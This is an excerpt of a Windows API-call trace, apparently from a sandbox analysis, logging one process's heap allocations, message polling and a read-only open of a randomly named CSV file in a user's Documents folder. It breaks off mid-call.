[0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0078.827] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0078.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0078.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0078.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0078.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0078.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0078.832] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.834] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0078.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0078.834] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.836] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0078.836] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0078.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\7QJQVMK.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\7qjqvmk.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.836] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.837] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.837] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.837] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0078.837] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0078.839] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0078.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0078.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.840] RtlAllocateHeap (HeapHandle=0x1780000, 